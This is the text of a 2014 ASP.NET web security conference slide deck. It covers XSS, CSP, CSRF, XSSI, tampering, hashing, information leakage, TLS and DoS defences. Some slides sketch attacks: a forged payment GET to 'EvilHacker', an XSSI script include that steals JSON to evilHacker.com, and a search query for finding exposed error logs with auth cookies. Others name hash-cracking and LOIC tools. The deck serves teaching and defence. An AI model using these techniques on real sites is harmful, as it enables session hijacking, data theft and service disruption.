20. Built-In XSS Prevention Features (.NET)
Nov 23, 2014
• Request Validation
o ASP .NET Web Forms: @Page EnableRequestValidation=“true”
o ASP .NET MVC: Controller.ValidateRequest=true;
o <httpRuntime requestValidationMode=“4.0" />
• Do not turn off request validation
o “Easy fix” for HTML editors
o Use HTML editors that HTML encode before submission
• Reliability
o Microsoft advice: Relying solely on built-in request validation is not enough
o No known vulnerabilities now (but not in the past)
• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode()
o HttpUtility just ensures output does not break HTML
o Performance penalty is +0.1 ms/transaction
21. Nov 23, 2014
Content Security Policy
• HTTP Header
o Content-Security-Policy: script-src ‘self’
• Features
o Whitelist sources of trusted content
o Blocks resources from untrusted locations (incl. inline scripts)
o Report of blocked resources
• Directives
o script-src; img-src; media-src; style-src; frame-src; connect-src
• Keywords
o 'none‘, 'self‘, 'unsafe-inline‘, 'unsafe-eval‘
• Browser support
o CanIUse.com CSP?
23. Cross-Site Request Forgery (CSRF)
• POST new password in form to GoodSite.com
• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
Nov 23, 2014
Def: Unauthorised commands transmitted from a user
whom a website trusts
• Synonyms: One-click attack, Session riding
• Case
o User logs in http://goodSite.com as usual
o http://evilHacker.com can
o Authenticated because cookies are sent
• Impact
o EvilHacker.com cannot read DOM but can POST / GET
o Act on behalf of the user (i.e. payment)
o User access is blocked or stolen
24. Cross Site Scripting Inclusion (XSSI)
Nov 23, 2014
• Case
o Exploits <script> element exception to Same Origin Policy
o http://goodSite.com includes own <script> for AJAX request
o http://evilHacker.com includes the same script
• Authenticated because cookies are sent
o Server returns JSON wrapped in function call
<script type="application/javascript" src=
"http://goodSite.com/Svc/Get?callback=parseResponse" />
o SCRIPT evaluated in evilHacker.com context and JSON is stolen
parseResponse ({“this”:”is”,”json”:”data”});
• Impact
o User data are stolen
• Prevention
o Check policy of script inclusion
25. Nov 23, 2014
CSRF Prevention & Mitigation
• NONCE token (URL, hidden field)
o Checked upon submission
o Protected by browser same origin policy
• User defined (password, CAPTCHA)
• Built-In (ASP.NET)
Page.ViewStateUserKey=Session.SessionID
o Signs the ViewState with unique user key
• Built-In (ASP.NET MVC)
o HtmlHelper.AntiForgeryToken() - generates a hidden form field
o [ValidateAntiForgeryToken] attribute for controller validation
o NOT a single-use token
• POST(HTTP) makes attacks harder
o Cross domain POSTs can be limited (CORS)
27. Nov 23, 2014
Parameter Tampering
Def: Parameters changed in unintended way
Common reasons
• Query string; Hidden form fields;
• Data-channel interception (M-i-t-M attack)
Common Mistakes
• Client side validation only
• Mismatch with predefined set of values
• Not validated access to entities on server (i.e. EntityId=???)
• Unprotected data sent to client
o Query strings; JavaScript parameters
28. Tampering Prevention & Mitigation
Nov 23, 2014
• Built-In (ASP.NET MVC) - None
• Built-In (ASP.NET)
• ViewState
o Not encrypted by default (Binary serialized, Base64 Encoded)
o Do not turn EnableViewstateMac off (Web Farm, X-domain POST)
• Event Validation
o “Invalid postback or callback argument…”
o Not encrypted (Binary serialized, Base64 Encoded)
o Do not turn event validation off
o Register for event validation
protected override void Render(HtmlTextWriter writer) {
…
Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, “John”); }
30. Nov 23, 2014
Encryption
• Protects sensitive data (if stolen)
o Credentials; Auth tokens; Configuration;
• SQL data encryption
o EncryptByPassPhrase
o EncryptByCert
o EncryptByKey
• Application level
o AesCryptoService, RijndaelManaged
o TripleDESCryptoServiceProvider
• Connection string encryption
o Machine specific encryption after deploy
aspnet_regiis –pe “connectionstrings” –app /[appname]
o Decryption done automatically
31. Nov 23, 2014
Hashing
• Irreversible function (MD5, SHA1, SHA256)
o MD5 generator: http://www.md5.cz/
o Smaller than the data
• Collisions allowed
• Usage
o Assure information was not changed (tampered)
o Protect passwords
• Compromising
o Good algorithm is always compromised by weak passwords
o Brute force (GPU)
o Precalculated “Rainbow tables” (Dictionary attack)
• http://www.hashkiller.co.uk/md5-decrypter.aspx
32. Nov 23, 2014
Protecting Hashes
• Random Salt
o [SecretText][Salt] -> [Hash]
o Changes hash value
o Invalidates rainbow tables
o Slows down brute force attacks
• Complex passwords
• Slow algorithms
• Key stretching (Rfc2898DeriveBytes class)
U1 = PRF(Password, Salt)
U2 = PRF(Password, U1)
...
Uc = PRF(Password, Uc-1)
• Outsource sensitive data storage (if possible)
33. Nov 23, 2014
Information Leakage
• Loss of sensitive data
o Display trace and log information
o Display raw error messages
o Google it: inurl: elmah.axd aspxauth
o Attacker can profile application and select appropriate attack
• Mitigation
o Custom error pages <CustomErrors mode=“on” defaultRedirect=“Error.aspx”>
o Turn off tracing
• Retail mode <deployment retail=“true”/>
o Set in machine.config for the whole server
o Sets Custom Errors = “on”, Debug = “false”
o Trace information is not displayed
• Test
35. Nov 23, 2014
SSL / TLS
• HTTP over SSL prevents packet sniffing
• Force SSL for the entire site
o Or at least for credentials interchange
• ASP.NET MVC: RequireHttpsAttribute
o Redirects Request to HTTPS scheme
• ASP.NET Web Forms
o Requires custom code
o https://code.google.com/p/securityswitch/
<securitySwitch mode="RemoteOnly">
<paths>
<add path="~/Login.aspx" />
</paths>
</securitySwitch>
37. Nov 23, 2014
Denial of Service Attack
DDoS
• Anonymous?!
o LOIC (Hive mode)
o TOR Anonymity Project
• Hash DoS (since 2003)
o POST params in hash table (with collisions)
o Too many hashes = 100% CPU
o Patch: Block POST of >1000 form fields
Prevention & Mitigation
• Dynamic IP restrictions IIS extension
o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions
• Good logging and diagnostics is essential
39. Nov 23, 2014
Takeaways
• Guidelines & Code Labs
o Open Web Application Security Project www.owasp.org
o Web App Exploits and Defenses google-gruyere
o 2013 Top 10 Web Security Vulnerabilities Top_10_2013
o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25
• Articles
o Hack-proofing ASP.NET Web Applications Adam Tuliper
o Hash DDoS Hash-Dos-Attack
• .NET Source Code referencesource.microsoft.com
• Tools
o ASafaWeb Analyser asafaweb.com
o Website and Web Server Security Testing www.beyondsecurity.com
40. Nov 23, 2014
Upcoming events
ISTA Conference 26-27 November
http://istabg.org/
Stay tuned for 2015:
Azure Bootcamp http://azure-camp.eu/
UXify Bulgaria http://uxify.org/
SQLSaturday https://www.sqlsaturday.com/
and more js.next();
41. Nov 23, 2014
Thanks to our Sponsors:
Diamond Sponsor:
Hosting partner:
Gold Sponsors:
Silver Sponsors:
Technological Partners:
Swag Sponsors:
Media Partners: